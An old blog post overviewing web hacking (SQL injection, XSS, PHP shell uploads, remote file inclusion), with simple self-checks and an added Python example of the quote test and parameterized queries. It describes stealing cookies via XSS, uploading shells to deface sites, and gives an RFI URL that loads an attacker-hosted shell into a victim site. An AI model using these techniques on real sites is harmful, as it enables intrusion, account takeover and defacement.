
Thursday, August 11, 2011

Web Hacking - How it was done

Web Hacking:

I will discuss some of the most commonly used web hacking techniques, which help hackers hack a website. This will help you to SAVE YOUR SITE!

1. SQL Injection
2. XSS
3. Shells
4. RFI
5. There are some more, but they are too big to be discussed here.

1. SQL Injection:


Most websites these days are connected to an SQL database, which lets them store usernames and passwords [encrypted] when a guest registers on the site. The SQL database processes a query every time a user logs in: it goes to the database and validates the password. If it is correct, the user is logged in; if not, an error is returned.
So the basic idea is to execute a command that gets parsed as a query in the database, in order to exploit the internal information of the database. I can't really put the entire tutorial here, because this is the most complicated way to hack a website!


P.S.: If you want to check whether YOUR website is vulnerable to an SQL injection attack, do the following.

If your site's URL is:


Code:
yoursite.com/index.php?id=545



Just add a ' at the end, like this:


code:
yoursite.com/index.php?id=545'
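
Why the single-quote check above gives a signal, and what removes it, shown as an added example that is not part of the original post. It uses Python's sqlite3 with a constructed in-memory table as a stand-in for the site's database; the table, the sample row and all function names are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the site's real database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO articles VALUES (545, 'Hello world')")
    return db

def lookup_concatenated(db, raw_id):
    # Vulnerable pattern: the id parameter is pasted into the SQL text,
    # so a stray ' changes the statement itself and the parser fails.
    sql = "SELECT title FROM articles WHERE id = " + raw_id
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return ("sql-error", str(exc))
    return ("ok", row[0] if row else None)

def lookup_parameterized(db, raw_id):
    # Hardened pattern: the SQL text is fixed and the value is bound,
    # so the ' is only data and simply matches no row.
    try:
        row = db.execute("SELECT title FROM articles WHERE id = ?", (raw_id,)).fetchone()
    except sqlite3.Error as exc:
        return ("sql-error", str(exc))
    return ("ok", row[0] if row else None)

def fails_quote_check(lookup, db, good_id="545"):
    # The post's self-test: request the normal id, then the same id plus '.
    # A database error that appears only with the quote means the input
    # reaches the SQL parser as code rather than as data.
    baseline = lookup(db, good_id)[0]
    quoted = lookup(db, good_id + "'")[0]
    return baseline == "ok" and quoted == "sql-error"

if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_concatenated, lookup_parameterized):
        print(fn.__name__, "fails quote check:", fails_quote_check(fn, db))
```

On a real site the fix is the same: bind the id as a query parameter instead of building the SQL string from the URL, and do not show raw database errors to visitors.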



2. XSS:


XSS is another nice way to hack a website. If a website or forum allows HTML in posts or articles, a hacker can post a malicious script into the content. Whenever a user opens the page, that user's cookies are sent to the hacker, so he can log in as that user and hack the website.


3. Shells:

A shell is a malicious .php script. What you have to do is find a place on a website where you can upload a file, such as avatars, recipes, your tricks, or your feedback, and try to upload your shell file from there. If it gets uploaded, then WHOA! You open it from the URL bar and you can see the entire "FTP" account of that web hosting. You can rename, edit, upload, or download anything you want, including the index page.
This is also known as a deface.


4. RFI:

RFI is a good way to deface a website. It is used with shell. Suppose you have uploaded your shell on:


yoursite.com/shell.txt

and you have found a site vulnerable to RFI... then you can do as follows:


code:
victimssite.com/index.php?page=yoursite.com/shell.txt



This will again give you access to the victim site's FTP, just like a shell, so you can hack up anything you want.

P.S.: If you want to check whether YOUR website is vulnerable to an RFI attack, do the following.

If your site's URL is:


code:
yoursite.com/index.php?id=545



Just put something like this at the end:


code:
yoursite.com/index.php?id=http://www.google.com



If it includes the Google page in your page, that means it is vulnerable to RFI.
